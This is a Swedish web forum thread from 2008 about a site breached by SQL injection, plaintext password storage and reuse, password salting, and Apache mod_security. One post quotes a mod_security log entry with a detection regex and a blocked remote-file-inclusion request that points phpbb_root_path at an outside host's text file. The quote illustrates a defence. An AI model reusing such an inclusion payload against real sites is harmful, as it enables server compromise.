Kom ihåg mig?
Home Menu

Menu


Efterfesten hackat

 
Ämnesverktyg Visningsalternativ
Oläst 2008-01-15, 23:12 #21
Jimpsson Jimpsson är inte uppkopplad
Flitig postare
 
Reg.datum: Jun 2006
Inlägg: 428
Jimpsson Jimpsson är inte uppkopplad
Flitig postare
 
Reg.datum: Jun 2006
Inlägg: 428
Efterfesten hackades av en scriptkiddie var ingen über haxxor eller så. Killen använde sql injection och dumpade ut hela databasen, samma som gjorde detta hackade även basshunters konto på lunar för ett par dagar sen, det var med brute force tror jag.

Det verkar bli en väldigt stor hacker trend i år.
Jimpsson är inte uppkopplad   Svara med citatSvara med citat
Oläst 2008-01-15, 23:26 #22
guran guran är inte uppkopplad
Har WN som tidsfördriv
 
Reg.datum: Apr 2004
Inlägg: 1 061
guran guran är inte uppkopplad
Har WN som tidsfördriv
 
Reg.datum: Apr 2004
Inlägg: 1 061
Jag håller med Xamda. Om ni bara visste hur många företag som lagrar sina kunders lösenord i klartext så skulle ni förmodligen börja skriva klantskallar i sådan omfattning att ni skulle dö av trissdess på kuppen.

I princip spelar det ingen roll om lösenorden är krypterade eller inte i databasen om själva databasen är åtkomlig för fel personer. Jag kan bara hoppas på att de databaser jag har på olika webbhotell har sådan hög säkerhet att inga objudna gäster kommer åt dem. Men det är ju inget jag har kontroll över.

WN skulle kanske ha ett forum för säkerhet där vi kan diskutera det här och hjälpa varandra med säkerheten och utan att bli påhoppad som okunnig. Jag kan villigt erkänn att jag har ett par databaser som inte lever upp till tillräcklig säkerhet men jag jobbar med att höja den och tips vore inte så dumt.

Jag kan gissa att det finns ganska många medlemmar här på WN som just nu sitter och funderar på hur de ska implementera ett salt i deras redan färdiga och idrifttagna databaser. Ska de ändra andra lösenord och skicka mail till alla medlemmar och tala om att de måste ansöka om nya lösenord? Går det att salta lösenorden dynamiskt utan att medlemmarna märker något, eller? Frågorna är säkert många.

Massor av medlemmar på WN har inte heller de kunskaper som behövs för att själva skriva koden eller kanske inte ens förstår vad problemet överhuvud taget består av rent tekniskt.
guran är inte uppkopplad   Svara med citatSvara med citat
Oläst 2008-01-15, 23:55 #23
Danski Danski är inte uppkopplad
Har WN som tidsfördriv
 
Reg.datum: Jul 2005
Inlägg: 1 208
Danski Danski är inte uppkopplad
Har WN som tidsfördriv
 
Reg.datum: Jul 2005
Inlägg: 1 208
Håller fullständigt med ovanstående guran att ett säkerhetsforum vore en bra idé, gärna endast för medlemmar också så man inte behöver spy ut sina problem till hela världen.

Och med tanke på om det går att salta utan användarna märker det. Det går att göra snabbt, lätt och smärtfritt =)
Danski är inte uppkopplad   Svara med citatSvara med citat
Oläst 2008-01-16, 00:18 #24
DudeRille DudeRille är inte uppkopplad
Mycket flitig postare
 
Reg.datum: Aug 2007
Inlägg: 599
DudeRille DudeRille är inte uppkopplad
Mycket flitig postare
 
Reg.datum: Aug 2007
Inlägg: 599
Citat:
Originally posted by Rokkan1@Jan 16 2008, 00:12
Efterfesten hackades av en scriptkiddie var ingen über haxxor eller så. Killen använde sql injection och dumpade ut hela databasen, samma som gjorde detta hackade även basshunters konto på lunar för ett par dagar sen, det var med brute force tror jag.

Det verkar bli en väldigt stor hacker trend i år.
Kan påpeka att lösenordet kom från efterfesten's databas till Basshunter's lunar..han hade samma lösen överallt.. dock rätt bra lösenord men duger inte när klantar som efterfesten inte kryptera det ens.
DudeRille är inte uppkopplad   Svara med citatSvara med citat
Oläst 2008-01-17, 11:43 #25
Danieloss avatar
Danielos Danielos är inte uppkopplad
Klarade millennium-buggen
 
Reg.datum: Oct 2005
Inlägg: 3 102
Danielos Danielos är inte uppkopplad
Klarade millennium-buggen
Danieloss avatar
 
Reg.datum: Oct 2005
Inlägg: 3 102
Citat:
Originally posted by Nicklas@Jan 15 2008, 08:17
Vad bygger dessa sajter på, är det open source?
Det borde finnas en röd tråd i dessa hackade sajter som gör dem enklare att hacka.
Troligen inte, opensource är faktiskt ofta säkrare än hemmabygda sajter.

En sak som gör att många apache servrar är mkt lätta att hacka är att folk inte har vett nog att köra mod_security i apache.

Här är ett exempel från en logg med mod_security:

Citat:

mod_security: Access denied with code 403. Pattern match "=(http|www|ftp)\\\\:/(.+)\\\\.(c|dat|kek|gif|jpe?g|jpeg|png|sh|txt|bmp| dat|txt|js|html?|tmp|asp)\\\\x20?\\\\?" at REQUEST_URI [id "390144"] [rev "1"] [msg "Rootkit attack: Generic Attempt to install rootkit"] [severity "CRITICAL"] [uri "/includes/functions.php?phpbb_root_path=http://www.gumgangfarm.com/shop/data/id.txt?"]
Danielos är inte uppkopplad   Svara med citatSvara med citat
Oläst 2008-01-17, 12:24 #26
Bladets avatar
Bladet Bladet är inte uppkopplad
Flitig postare
 
Reg.datum: Sep 2004
Inlägg: 313
Bladet Bladet är inte uppkopplad
Flitig postare
Bladets avatar
 
Reg.datum: Sep 2004
Inlägg: 313
Citat:
Ursprungligen postat av danielos
Citat:
Ursprungligen postat av Nicklas
Vad bygger dessa sajter på, är det open source?
Det borde finnas en röd tråd i dessa hackade sajter som gör dem enklare att hacka.
Troligen inte, opensource är faktiskt ofta säkrare än hemmabygda sajter.
Jo, de flesta open source är ju ganska säkra om man bara ser till att patcha dem DIREKT en känd läcka hittas. Annars läcker ju de som soll.

Och jepp, mod_security fixar en hel del om man kodar dåligt ( = jag ).
Bladet är inte uppkopplad   Svara med citatSvara med citat
Svara


Aktiva användare som för närvarande tittar på det här ämnet: 1 (0 medlemmar och 1 gäster)
 

Regler för att posta
Du får inte posta nya ämnen
Du får inte posta svar
Du får inte posta bifogade filer
Du får inte redigera dina inlägg

BB-kod är
Smilies är
[IMG]-kod är
HTML-kod är av

Forumhopp


Alla tider är GMT +2. Klockan är nu 14:04.

Programvara från: vBulletin® Version 3.8.2
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
Svensk översättning av: Anders Pettersson
 
Copyright © 2017